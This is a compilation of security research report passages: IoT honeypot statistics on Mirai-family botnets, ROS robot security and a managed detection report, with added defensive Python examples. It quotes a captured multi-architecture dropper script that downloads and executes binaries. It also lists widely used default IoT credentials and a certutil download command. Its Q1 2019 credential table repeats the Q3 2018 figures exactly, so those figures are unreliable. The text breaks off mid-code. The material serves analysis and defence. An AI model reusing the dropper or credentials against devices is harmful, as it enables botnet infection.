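As an added example (not Kaspersky’s pipeline), this is how the username/password table above can be produced from honeypot logs and compared between two periods. It assumes Cowrie-style JSON-lines events (`cowrie.login.failed` / `cowrie.login.success` with `username` and `password` fields); the log lines themselves are constructed, with tiny counts standing in for the real volumes, and empty passwords are normalized to `<empty>` as in the appendix.

```python
"""Aggregate Telnet/SSH login attempts into (username, password) counts and
diff the top-n between two periods. Added example, not Kaspersky's code; the
log events below are constructed in the shape of Cowrie's login events."""
import json
from collections import Counter
from typing import Dict, Iterable, List, Tuple

LOGIN_EVENTS = {"cowrie.login.success", "cowrie.login.failed"}
Cred = Tuple[str, str]


def credential_counts(lines: Iterable[str]) -> Counter:
    """Count (username, password) pairs over one period of JSON-lines logs."""
    counts: Counter = Counter()
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue  # torn line at a rotation boundary: skip it rather than abort the run
        if ev.get("eventid") not in LOGIN_EVENTS:
            continue  # connects, commands, downloads etc. are not credentials
        user = ev.get("username") or "<empty>"
        pw = ev.get("password") or "<empty>"  # same convention as the appendix tables
        counts[(user, pw)] += 1
    return counts


def top(counts: Counter, n: int = 10) -> List[Tuple[str, str, int]]:
    """The appendix-style table: most common pairs first."""
    return [(u, p, c) for (u, p), c in counts.most_common(n)]


def shift(prev: Counter, cur: Counter, n: int = 10) -> Tuple[List[Cred], List[Cred]]:
    """Pairs that entered the top-n and pairs that dropped out between two periods."""
    was = {k for k, _ in prev.most_common(n)}
    now = {k for k, _ in cur.most_common(n)}
    return sorted(now - was), sorted(was - now)


def make_log(attempts: Dict[Cred, int], src_ip: str = "203.0.113.5") -> List[str]:
    """Constructed Cowrie-style events (documentation-range source address)."""
    lines = []
    for (user, pw), n in attempts.items():
        for i in range(n):
            lines.append(json.dumps({
                "eventid": "cowrie.login.failed",
                "username": user, "password": pw,
                "src_ip": src_ip, "session": f"{user}-{i}",
            }))
    lines.append(json.dumps({"eventid": "cowrie.session.connect", "src_ip": src_ip}))  # ignored
    lines.append('{"eventid": "cowrie.login.failed", "username": "root"')  # torn line, skipped
    return lines


# Two constructed periods echoing the trend in the appendix: support/support
# dominates the earlier one, default/default the later one.
PERIOD_A = make_log({("support", "support"): 6, ("root", "vizxv"): 5,
                     ("admin", "admin"): 4, ("root", "default"): 3})
PERIOD_B = make_log({("default", "default"): 7, ("admin", "admin"): 5,
                     ("root", "vizxv"): 4, ("root", ""): 2})

if __name__ == "__main__":
    a, b = credential_counts(PERIOD_A), credential_counts(PERIOD_B)
    print(top(a, 3), top(b, 3), shift(a, b, n=3))
```

Run against real Cowrie output, `shift` is the quick way to spot the kind of change the text describes, such as a new default credential appearing in the top ten after a device-specific exploit is published.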

New devices are probed every quarter as exploits are released into the wild. For example, in Q1 2019 we observed bots trying to infect GPON routers using a specific hard-coded password. Our colleagues at Trend Micro wrote about this at the end of 2018.

Identifying collected credentials for Q3 2018 (left), Q4 2018 (center) and Q1 2019 (right)

Statistics: malware

While common computers usually run on Intel or AMD CPUs (little-endian x86 or x86_64), embedded IoT devices use a broader range of CPU architectures supplied by multiple vendors.

While classifying our samples, we noticed that we had files using both endianness types, designed to be executed on multiple CPU architectures, such as ARM, Intel x86 and MIPS.
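The classification described above can be done from the ELF header alone, without running or fully parsing the sample. The following is an added example (not part of the original article): it reads EI_CLASS, EI_DATA and e_machine from the first 20 bytes and tallies a corpus by architecture, word size and byte order. The sample headers are constructed, not real malware, and are named after the dropper’s download targets using the usual convention that `mips` is big-endian and `mipsel` little-endian.

```python
"""Classify IoT samples by CPU architecture and endianness from the ELF
header. Added example, not Kaspersky's code; SAMPLES is a constructed corpus."""
import struct
from collections import Counter
from typing import Dict, Optional

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification (<elf.h>)
MACHINES: Dict[int, str] = {
    2: "sparc", 3: "x86", 4: "m68k", 8: "mips", 20: "powerpc",
    40: "arm", 42: "sh4", 62: "x86_64", 183: "aarch64",
}


def classify_elf(blob: bytes) -> Optional[Dict[str, str]]:
    """Return arch/bits/endian for an ELF blob, or None for anything else."""
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        return None  # e.g. the dropper shell script itself, or a truncated download
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None  # corrupt or deliberately malformed header
    endian = "<" if ei_data == 1 else ">"
    # e_machine sits at offset 18 for both ELF32 and ELF64 and is stored in
    # the file's own byte order, so the endianness flag must be read first.
    (e_machine,) = struct.unpack_from(endian + "H", blob, 18)
    return {
        "arch": MACHINES.get(e_machine, f"unknown(0x{e_machine:x})"),
        "bits": "32" if ei_class == 1 else "64",
        "endian": "little" if ei_data == 1 else "big",
    }


def make_header(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Build a minimal 20-byte ELF header for the constructed corpus."""
    endian = "<" if ei_data == 1 else ">"
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8  # e_ident
    return ident + struct.pack(endian + "HH", 2, e_machine)  # e_type=ET_EXEC, e_machine


SAMPLES: Dict[str, bytes] = {  # constructed, named like the dropper's downloads
    "mips": make_header(1, 2, 8),
    "mipsel": make_header(1, 1, 8),
    "armv7l": make_header(1, 1, 40),
    "x86": make_header(1, 1, 3),
    "x86_64": make_header(2, 1, 62),
    "powerpc": make_header(1, 2, 20),
    "sh4": make_header(1, 1, 42),
    "dropper.sh": b"#!/bin/bash\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /\n",
}


def summarize(samples: Dict[str, bytes]) -> Counter:
    """Tally a corpus by (arch, bits, endian); non-ELF files get their own bucket."""
    counts: Counter = Counter()
    for blob in samples.values():
        info = classify_elf(blob)
        key = (info["arch"], info["bits"], info["endian"]) if info else ("non-elf", "", "")
        counts[key] += 1
    return counts


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:12s} {classify_elf(blob)}")
    print(summarize(SAMPLES))
```

Because the dropper fetches one binary per architecture, the architecture distribution of the collected files is itself a fingerprint of the device population the campaign is after.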

Below is a table with all types of samples we collected.

A well-known method used by attackers, once they get access to a device, is to try and deploy their malware for all architectures without any checks. This approach works because only one binary will be executed correctly. Luckily for us, this allows us to grab all the links and download all the samples.

Below is an example of such a script.

    #!/bin/bash
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mips; chmod +x mips; ./mips; rm -rf mips
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sh4; chmod +x sh4; ./sh4; rm -rf sh4
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/x86; chmod +x x86; ./x86; rm -rf x86
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i686; chmod +x i686; ./i686; rm -rf i686
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i586; chmod +x i586; ./i586; rm -rf i586
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/m68k; chmod +x m68k; ./m68k; rm -rf m68k
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sparc; chmod +x sparc; ./sparc; rm -rf sparc
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp

Besides username/password combinations, the type of architecture being targeted is an additional characteristic that helps us to identify other potentially targeted devices.

Attacking countries and networks

The top countries probing our honeypots were China and Brazil, followed by Egypt and Russia, the latter two only 0.1 percentage points apart. The trend was consistent throughout 2018 and 2019, with slight changes in the country rankings.

Below are the top 20 most active attackers and their ASNs, based on attacker IP analysis.

IP             ASN                             Country         Sessions
198.98.*.*     FranTech Solutions (53667)      United States   9850914
5.188.*.*      Global Layer B.V. (49453)       Ireland         8845554
46.101.*.*     DigitalOcean, LLC (14061)       Germany         6400293
5.188.*.*      Global Layer B.V. (57172)       Russia          5687846
5.188.*.*      Global Layer B.V. (57172)       Russia          5668684
5.188.*.*      Global Layer B.V. (57172)       Russia          5651793
104.168.*.*    Hostwinds LLC (54290)           United States   5208208
5.188.*.*      Global Layer B.V. (57172)       Russia          5183386
5.188.*.*      Global Layer B.V. (57172)       Russia          4999999
5.188.*.*      Global Layer B.V. (49453)       Ireland         4997344
5.188.*.*      Global Layer B.V. (57172)       Russia          4996561
198.199.*.*    DigitalOcean, LLC (14061)       United States   4731014
68.183.*.*     DigitalOcean, LLC (14061)       United States   4654696
104.248.*.*    DigitalOcean, LLC (14061)       United States   4509490
5.188.*.*      Global Layer B.V. (49453)       Ireland         4413067
88.214.*.*     FutureNow Inc. (201912)         N/A             4210692
5.188.*.*      Global Layer B.V. (49453)       Ireland         4209439
134.19.*.*     Global Layer B.V. (49453)       Netherlands     4206674
185.244.*.*    3W Infra B.V. (60144)           Netherlands     4181413
5.188.*.*      Global Layer B.V. (49453)       Ireland         4128155

Infected sessions

Starting in 2018, we have presented two metrics in our data: “all sessions” and “infected sessions”. An infected session is one in which at least one malware file was requested, or dropped, from the Internet. A non-infected session might be one initiated by mistake by a legitimate user via a mistyped IP address, or by a bot scanning the Internet. We have seen a steady increase in all sessions (Telnet, SSH, web, etc.) opened on our honeypots, and the more honeypots we add to our network, the more traffic we observe, which means that attackers are constantly scanning the Internet in order to infect new devices. In most cases, the devices scanning for new hosts on the Internet are themselves infected.
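Two points made above, pulling every download link out of a multi-architecture dropper like the one quoted in the malware section, and the definition of an “infected session” as one that requested at least one file from the Internet, can be implemented with the same small parser. The following is an added example, not Kaspersky’s code; the dropper text and the session transcripts are constructed, with the documentation-range address 198.51.100.7 standing in for the redacted host.

```python
"""Parse a captured multi-architecture dropper and classify honeypot sessions
as infected or not. Added example, not Kaspersky's code; DROPPER and SESSIONS
are constructed test data."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# One stage of the dropper quoted above: fetch a binary, chmod it, run it.
# The executed name must equal the chmod'd name, and that name is how the
# script labels the target architecture.
STAGE_RE = re.compile(
    r"wget\s+(?P<url>https?://(?P<host>[^/\s:]+)[^\s;]*)\s*;\s*"
    r"chmod\s+\+x\s+(?P<name>\S+)\s*;\s*\./(?P=name)"
)
# Any outbound HTTP(S) fetch at all, for the infected-session test.
URL_RE = re.compile(r"https?://[^\s;|&<>]+")


@dataclass
class Dropper:
    urls: List[str]     # every payload URL, in script order
    archs: List[str]    # architecture labels, e.g. mips, mipsel, armv7l
    hosts: Set[str]     # distribution hosts to block or pull samples from


def parse_dropper(script: str) -> Dropper:
    """Extract payload URLs, architecture labels and hosts from a dropper script."""
    urls: List[str] = []
    archs: List[str] = []
    hosts: Set[str] = set()
    for m in STAGE_RE.finditer(script):
        urls.append(m.group("url"))
        archs.append(m.group("name"))
        hosts.add(m.group("host"))
    return Dropper(urls, archs, hosts)


def is_infected(commands: List[str]) -> bool:
    """'Infected session' as defined above: at least one file requested from the Internet."""
    return any(URL_RE.search(cmd) for cmd in commands)


def classify_sessions(sessions: Dict[str, List[str]]) -> Dict[str, bool]:
    return {sid: is_infected(cmds) for sid, cmds in sessions.items()}


# Constructed dropper modelled on the captured script (four architectures).
PREFIX = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
DROPPER = "#!/bin/bash\n" + "".join(
    f"{PREFIX}wget http://198.51.100.7/{arch}; chmod +x {arch}; ./{arch}; rm -rf {arch}\n"
    for arch in ("mips", "mipsel", "armv7l", "x86")
)

# Constructed command transcripts of three Telnet sessions.
SESSIONS: Dict[str, List[str]] = {
    "s1": ["enable", "system", "shell", "sh", DROPPER.splitlines()[1]],  # bot dropping malware
    "s2": ["ls -la", "exit"],                                            # stray human, mistyped IP
    "s3": ["cat /proc/cpuinfo | grep name | wc -l", "uname -a"],          # fingerprinting scanner only
}

if __name__ == "__main__":
    d = parse_dropper(DROPPER)
    print(d.archs, sorted(d.hosts))
    print(classify_sessions(SESSIONS))
```

Session s3 is the interesting negative: it issues the kind of `/proc/cpuinfo` probe described in the fingerprinting section but never requests a file, so under the page’s definition it is a scan, not an infection.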

Malware families: 2018 vs. 2019

In terms of detected hashes, we have seen a few changes in top samples trying to attack our honeypots. Overall, in 2018 as well as 2019, Mirai remained the most popular malware family with over 30,000 samples detected in 2018 and almost 25,000 samples detected in the first half of 2019. While the Hajime malware, thoroughly researched by Kaspersky and by Symantec in 2017, was quite active during its prime years, it is almost non-existent on our 2019 charts.

Instead, we have seen an increase in well-known malware families, NyaDrop and Gafgyt, trying to infect newer devices.

Below are our Top 10 samples detected in Q1 2018 and Q1 2019.

Q1 2018                                               Q1 2019
Backdoor.Linux.Mirai.c              23454 (50.46%)    Trojan-Downloader.Linux.NyaDrop.b   24437 (38.57%)
Trojan-Downloader.Linux.Hajime.a     8657 (18.62%)    Backdoor.Linux.Mirai.b              13960 (22.06%)
Backdoor.Linux.Mirai.b               3566  (7.67%)    Backdoor.Linux.Mirai.ba              7664 (12.11%)
Trojan-Downloader.Linux.NyaDrop.b    3523  (7.58%)    Backdoor.Linux.Mirai.ad              1224  (1.92%)
Backdoor.Linux.Mirai.ba              2468  (5.31%)    Backdoor.Linux.Mirai.au              1185  (1.87%)
Trojan-Downloader.Shell.Agent.p       502  (1.08%)    Backdoor.Linux.Gafgyt.bj              872  (1.38%)
Trojan-Downloader.Shell.Agent.as      426  (0.91%)    Trojan-Downloader.Shell.Agent.p       659  (1.04%)
Backdoor.Linux.Mirai.n                348  (0.74%)    Backdoor.Linux.Gafgyt.az              468  (0.74%)
Backdoor.Linux.Gafgyt.ba              339  (0.72%)    Backdoor.Linux.Mirai.c                455  (0.72%)
Backdoor.Linux.Gafgyt.af              279  (0.60%)    Backdoor.Linux.Mirai.h                434  (0.68%)

Uberpot

Besides the common honeypots that listen on specific ports, we have also created a multi-port honeypot, named “uberpot”. The idea is simple: the honeypot listens on all TCP and UDP ports and accepts connections, and logs data received and meta information. The main objective is to identify new attack vectors, and attacks on other services and ports, e.g. due to new devices or vendor-specific port configurations.

TCP is clearly king in terms of attacker services, even though we still see some UDP/ICMP traffic directed to our uberpot instances.

In terms of infected sessions, we get hit by around 6,000 daily, but in January 2019, we noticed a spike in traffic with more than 7,500 daily sessions hitting random TCP ports.

In terms of other protocols, UDP and ICMP traffic is quite insignificant compared to TCP. We do not monitor other “exotic” protocols, such as DCCP, SST or ATP.

Attacked protocols on Uberpot

So far, mostly TCP-services have been attacked. Remote Administration Services such as SSH, Telnet, VNC and RDP have been a popular target, in addition to databases and web servers.

Attacked protocols on Uberpot

We continue to improve our systems and sensors, and expand our infrastructure to monitor threats and help protect against these.


A constant issue for security researchers is new sources of malware, data and infections. As a company or security team, you want to have full visibility into what hosts are attacking you and what kind of services attackers are going after. Apart from traditional defense mechanisms, log monitoring and training, deploying honeypots in key parts of your public or private infrastructure can also help in identifying ongoing probes into your network.

The main issues when running a large network of honeypots are maintenance, aggregation and processing of logs, and bug fixing. We solve these problems by moving all honeypots into a dockerized infrastructure. This means that the front-facing hosts require very few resources: a node can run on a Raspberry Pi.

Our solution is simple: we offer a Docker image and install scripts that forward malicious traffic aimed at “vulnerable” ports back to our infrastructure through a WireGuard UDP tunnel. We call these machines “nodes” and, as mentioned above, a node can even run on a Raspberry Pi. Once such a machine is installed, all you need to do is redirect the ports you want to monitor towards it. You can assign public IPs directly, as some of our partners do, or use DNAT (port forwarding) for only the ports you are interested in.

Once traffic hits your node, it is sent to our aggregator, where a Docker machine handles it and responds. We then generate statistics and all required data on the aggregator.

For more information about our infrastructure, please check out our SAS 2019 video.


While the trend for IoT-specific malware is growing as the IoT landscape expands into more and more areas, we will continue to extend our detection and research capabilities. Awareness is a key element along with defense technologies based on analysis and following trends.

One way to stay on top of attackers is to ingest dedicated feeds for IoT threats. For example, we offer such feeds on our Threat Intelligence platform.

If you are interested in starting a research partnership with Kaspersky and running honeypots on your unused IP addresses, please get in touch with us at honeypots@kaspersky.com. We are happy to partner with you to deploy our Honeypot-as-a-Service prototype.

As explained in the “Honeypots-as-a-Service” section, we aggregate, correlate and cluster all incoming connections and all processed data is made available to you almost in real time.


List of passwords for recent quarters:

Q3 2018
username   password          count
support    support           2627805
root       vizxv             2376654
admin      admin             2359985
root       default           2355762
default    S2fGqNFs          2140316
default    OxhlwSG8          1683879
root       xc3511            1451906
root       anko              1365481
root       7ujMko0admin      1336390
root       admin             1281745
root       12345             1273103
root       password          1239467
user       user              1238778
telnet     telnet            1171306
root       hunt5759          1136995
default    <empty>           1058371
root       root               995550
admin      admin1234          977147
root       1001chin           932786

Q4 2018
username   password          count
support    support            703515
root       vizxv              583926
admin      admin              547302
root       default            429091
default    S2fGqNFs           423178
default    OxhlwSG8           377638
root       7ujMko0admin       297929
telnet     telnet             292827
root       password           283462
root       xc3511             281053
root       1001chin           276828
root       12345              273787
default    <blank>            268606
root       admin              264256
root       hunt5759           258697
root       anko               256498
user       user               251272
guest      12345              246927
root       root               218373
root       <empty>            192910

Q1 2019
username   password          count
support    support           2627805
root       vizxv             2376654
admin      admin             2359985
root       default           2355762
default    S2fGqNFs          2140316
default    OxhlwSG8          1683879
root       xc3511            1451906
root       anko              1365481
root       7ujMko0admin      1336390
root       admin             1281745
root       12345             1273103
root       password          1239467
user       user              1238778
telnet     telnet            1171306
root       hunt5759          1136995
default    <empty>           1058371
root       root               995550
admin      admin1234          977147
root       1001chin           932786
root       <empty>            870276

Q2 2019
username   password          count
default    default           2523832
admin      admin             2030987
root       7ujMko0admin      2023333
root       vizxv             1842271
root       default           1803912
admin      password          1671593
default    <blank>           1656853
default    OxhlwSG8          1524072
default    S2fGqNFs          1497600
root       “taZz@23495859”   1402338
root       zyad1234          1116542
admin      aquario           1103479
default    tlJwpbo6          1065423
admin      admin123          1028715
guest      12345z             819617
guest      12345              757875
admin      synnet             637017
guest      guest              487789
guest      <empty>            461508
guest      123456             460613

Q3 2019
username   password          count
default    default           4211802
admin      admin             3692028
root       vizxv             3174770
root       default           3094578
root       “taZz@23495859”   2964442
default    <blank>           2897669
root       tsgoingon         2341043
root       7ujMko0admin      2340426
admin      aquario           2316776
admin      admin123          2278549
admin      password          2103600
default    OxhlwSG8          2074258
default    S2fGqNFs          1983527
default    tlJwpbo6          1519887
guest      12345             1105911
guest      123456             991206
guest      guest              937530
admin      synnet             920939
guest      admin              694245
guest      <empty>            614275
14 October 2019

A glimpse into the present state of security in robotics

 Download full report (PDF)

The world of today continues its progress toward higher digitalization and mobility. Developments from the Internet of Things (IoT) through augmented reality to Industry 4.0 rely on stronger automation and the use of robots, and all of them bring more efficiency to production processes and improve the user experience across the globe. According to some estimates, these systems will become the norm in wealthy households before 2040.

Nowadays, however, these “robots” are not limited to futuristic humanoid machines. They include various devices, such as robot arms in factories, delivery robots, autonomous cars, automated babysitters, etc.

Digitized systems of the future will involve deployable robotic systems in highly networked environments, communicating remotely with various services and systems for higher efficiency. For now this is only an expectation, and truly functional deployable robotic systems do not yet exist, but there are already certain developments in that area.

Robot Operating System

The research and development community, established around a shared interest in the future of robotics, initially required a unified and standard platform. To achieve that, back in 2007, Willow Garage introduced Robot Operating System (ROS), essentially a collection of middleware frameworks for robot software development, and a distributed system providing a mechanism for nodes to exchange information over a network. It operates like a service for distribution of data among various nodes in a system. A central master service is responsible for tracking published and subscribed topics, and provides a parameter server for nodes to store various metadata. Nodes can publish data as topics by advertising to the ROS master service. Other nodes can subscribe to these topics by querying the master, which provides the IP address and TCP port number of any nodes publishing a given topic, allowing the subscriber to contact the publishers directly to establish further connections. ROS has a distributed architecture: nodes can run on the same machine as the master, or on different machines. Apart from that, ROS possesses a number of ready-to-go libraries for solving various tasks, such as recognition of objects in an image or space mapping.

That said, ROS itself can hardly be positioned as a fully functional operating system; it is rather a set of open-source libraries that helps researchers and developers to visualize and record data, navigate the ROS package structures easily, and create scripts that automate complex configuration and setup processes.

Open source for study

ROS was designed with open source in mind—by a researcher, for researchers—with the intention of enabling users to choose the configuration of the tools and libraries that interacted with the core of ROS, so that the users could shift their software stacks to fit their robot or application area.

This open-source nature brings certain peculiarities to the subject of robotics cybersecurity. ROS is mainly used for research purposes, in universities and by engineering enthusiasts. As with many other research platforms, the ROS designers made a conscious decision to exclude security mechanisms: they did not have a clear model of security threats, were not security experts themselves, and wanted to keep research and development comfortable and efficient. For instance, the ROS master node trusts all nodes that connect to it, and thus should not be exposed to the Internet, or to any network with unauthorized users on it, without additional measures restricting access to the system.

Overall, ROS has no built-in security; it lacks authentication, authorization and confidentiality features. Some of those issues have been addressed in ROS 2.0, a new version of ROS that is under heavy development and will take advantage of modern libraries and technologies for core ROS functionality, adding support for real-time code and embedded hardware. However, the second version is still not widely adopted: the first version is sufficient for most research, and more complex projects take a long time to migrate to an updated platform.


Nevertheless, ROS is expected to play an important role in robotics outside of pure research-oriented scenarios. And the significant security issues it bears should be addressed before ROS-based products like social robots, autonomous cars, etc. fly from university classrooms to reach mass markets.

By definition, networks are shared resources, so it is important to consider the security aspects of connecting systems using ROS, as a ROS master will by default respond to requests from any device on the network (or host) that can connect to it. Any host on the network can publish or subscribe to topics, list or modify parameters, and so on.
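The exposure described above can be checked directly, because the Master API is plain XML-RPC. The following is an added example for this article, not ROS project code: it calls getSystemState() and getParamNames() with an arbitrary caller id, which a default master answers without any authentication, and flags topics that look like sensor streams or motion commands. The default master port 11311 is real; FakeMaster is a constructed stand-in so the script runs offline, and the sensor/actuator keyword lists are an assumed heuristic, not a ROS convention.

```python
"""Audit what an unauthenticated client can learn from a ROS 1 master.

Added example for this article, not ROS project code. The Master API calls
(getSystemState, getParamNames) and the default master port 11311 are real;
FakeMaster is a constructed stand-in that answers like a master which trusts
every caller, so the probe runs offline. The sensor/actuator keyword lists are
an assumed heuristic, not a ROS convention.
"""
import threading
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCServer

ROS_MASTER_DEFAULT_PORT = 11311
CALLER_ID = "/audit_probe"  # the master does not authenticate caller ids

SENSOR_HINTS = ("camera", "image", "scan", "lidar", "audio")      # assumed heuristic
ACTUATOR_HINTS = ("cmd_vel", "joint", "motor", "gripper", "arm")  # assumed heuristic


class _TimeoutTransport(xmlrpc.client.Transport):
    """Transport with a per-connection socket timeout, so a scan does not hang."""

    def __init__(self, timeout):
        super().__init__()
        self._timeout = timeout

    def make_connection(self, host):
        conn = super().make_connection(host)
        conn.timeout = self._timeout  # http.client.HTTPConnection applies this on connect()
        return conn


def probe_ros_master(uri, timeout=3.0):
    """Return publishers, subscribers, services and parameter names, as any caller can."""
    proxy = xmlrpc.client.ServerProxy(uri, transport=_TimeoutTransport(timeout))
    code, msg, (publishers, subscribers, services) = proxy.getSystemState(CALLER_ID)
    if code != 1:
        raise RuntimeError(f"getSystemState failed: {msg}")
    code, msg, params = proxy.getParamNames(CALLER_ID)
    if code != 1:
        raise RuntimeError(f"getParamNames failed: {msg}")
    return {
        "publishers": {topic: list(nodes) for topic, nodes in publishers},
        "subscribers": {topic: list(nodes) for topic, nodes in subscribers},
        "services": {name: list(nodes) for name, nodes in services},
        "params": sorted(params),
    }


def assess_exposure(state):
    """Map the listing onto the two risks the text names: leaked sensor data and injected motion."""
    findings = []
    for topic in state["publishers"]:
        if any(h in topic for h in SENSOR_HINTS):
            findings.append(f"readable sensor stream: {topic}")
    for topic in state["subscribers"]:
        if any(h in topic for h in ACTUATOR_HINTS):
            findings.append(f"writable actuator topic: {topic}")
    findings.extend(f"callable service: {name}" for name in state["services"])
    return findings


class FakeMaster:
    """Constructed stand-in: answers the Master API for any caller id."""

    def getSystemState(self, caller_id):
        publishers = [["/camera/image_raw", ["/camera_node"]], ["/cmd_vel", ["/teleop"]]]
        subscribers = [["/cmd_vel", ["/base_controller"]]]
        services = [["/reset_odom", ["/base_controller"]]]
        return [1, "current system state", [publishers, subscribers, services]]

    def getParamNames(self, caller_id):
        return [1, "parameter names", ["/rosdistro", "/run_id", "/robot_description"]]


def start_fake_master(port=0):
    """Serve FakeMaster on loopback in a daemon thread; returns (server, uri)."""
    server = SimpleXMLRPCServer(("127.0.0.1", port), logRequests=False)
    server.register_instance(FakeMaster())
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    server, uri = start_fake_master()  # for a real master use http://<robot>:11311
    state = probe_ros_master(uri)
    for finding in assess_exposure(state):
        print(finding)
    server.shutdown()
```

Pointed at a real master URI, the same probe returns the live topic graph; the keyword heuristic only orders the output, since the security problem is that the listing is available at all.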

In this regard, cyberattacks are a growing threat to the integrity of robotic systems at the core of this new emerging ecosystem. A robot can sense the physical world using sensors, or directly change the physical world with its actuators. Thus, a robot could leak sensitive information about its environment, such as data from sensors or cameras, if accessed by an unauthorized party, or even receive commands to move, which creates both a privacy and a safety risk.

Initial studies have already validated the above consideration: in 2018, over 100 publicly accessible hosts running a ROS master node were identified in an analysis of the entire IPv4 address space for deployed ROS systems. Some of these appeared to be real robots, potentially exposed to unauthorized publishing injections, denial of service (DoS) attacks, or unauthorized data access. This made the robots potential targets, capable of being remotely moved in ways dangerous to both the robot and the objects around it.

But apart from the technical aspect, there are more specific dimensions to be concerned about when it comes to robotics security. To learn more in this regard, Kaspersky and the research team at the University of Ghent looked deeper into how the wide use of so-called “social robots” in the future could affect humans’ private lives and social behavior, and what the cybersecurity takeaways from this impact are.

It is our hope that this brief outline of robotics cybersecurity issues will encourage others to follow our example and bring about greater public and community awareness of the subject.

8 October 2019

Managed Detection and Response analytics report, H1 2019

 Download full report (PDF)


This report contains the results of the Managed Detection and Response (MDR) service (brand name – Kaspersky Managed Protection). The MDR service provides managed threat hunting and initial incident response. Threat hunting is the practice of iteratively searching through data collected from sensors (referenced as telemetry or events) in order to detect threats that successfully evade automatic security solutions. A brief description of the service is provided at the end of this document.

The MDR service processes security operations events, focusing on and improving activity performed by professionals in charge of threat hunting projects, their level of expertise and the threat intelligence enabled through the detection process. According to David Bianco’s Pyramid of Pain, TTP-based threat detection is the most difficult type of indicators of attacks (IoAs) to circumvent for an adversary. The Kaspersky team is focused on TTP-based threat hunting in its MDR service, where humans are heavily involved to ensure the best judgments are made on collected events, especially advanced threats. This significantly augments automatic detection logic provided by endpoint protection products (EPP) used as sensors during the service delivery.

Life cycle of a threat hunting hypothesis

Geography and industry verticals of the MDR service delivered by Kaspersky

The analysis was conducted based on data from organizations around the world that used our service in the first half of 2019. Government bodies, financial institutions, industrial organizations, telecommunication and IT companies worldwide use our service to protect their IT infrastructure. Data from organizations that used our services for frequent health checks was also included.

Incident detection operations

Almost all alerts were generated by the analysis of events from endpoint sensors based on IoAs (TTP-based threat detection logic) and less than 2% of them were identified as cybersecurity incidents.

The low IoA conversion rate reflects the need to detect advanced threats which use a ‘living off the land’ approach, with behaviors that are very similar to legitimate activity. The more a malicious behavior mimics the normal behavior of users and administrators, the higher the rate of false positives and, consequently, the lower the conversion rate from alerts.

Mean time to response (MTTR)

MTTR (or incident processing time) is the time from automatic alert generation, as a result of automated analysis of events, to its resolution by Kaspersky experts.

~25 mins average MTTR

It is worth noting that incident investigation may include additional work on the customer side or extra expert analysis and it may require more time for resolution – on average, up to 37 minutes in cases of incidents associated with advanced threats or sophisticated attack detection.

Examples of IoAs:
  • Start command line (or bat/PowerShell) script within a browser, office application or server application (such as SQL server, SQL server agent, nginx, JBoss, Tomcat, etc.);
  • Suspicious use of certutil for file download (example command: certutil -verifyctl -f -split https[:]//example.com/wce.exe);
  • File upload with BITS (Background Intelligent Transfer Service);
  • whoami command from SYSTEM account, and many others.
The main ideas behind IoA-TTP-based detection:
  • Applicable for detection of post-exploitation activity.
  • Detects standard but suspicious functionality of legitimate utilities: therefore, classification of observed behavior as malicious cannot be accomplished in a fully automated manner.
  • Tools used by attackers are not explicitly malicious, but their hostile usage is.
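The IoAs listed above are rules over process-creation telemetry, and the report's point that a hit is an alert rather than an incident follows from the fact that each rule also matches legitimate activity. The following added example (not Kaspersky's detection logic) encodes the four listed IoAs over constructed, Sysmon-style process-creation events; the parent and script-host lists are assumptions an analyst would tune per environment, and the ATT&CK technique ids are the public ones for each behaviour.

```python
"""Match process-creation events against TTP-based IoAs of the kind the report lists.

Added example, not Kaspersky's detection logic. Events are constructed,
Sysmon-style process-creation records (parent image, image, command line, user);
the ATT&CK technique ids are the public ones for each behaviour. Parent and
script-host lists are assumptions that an analyst would tune per environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SPAWN_SENSITIVE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",            # office applications
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",            # browsers
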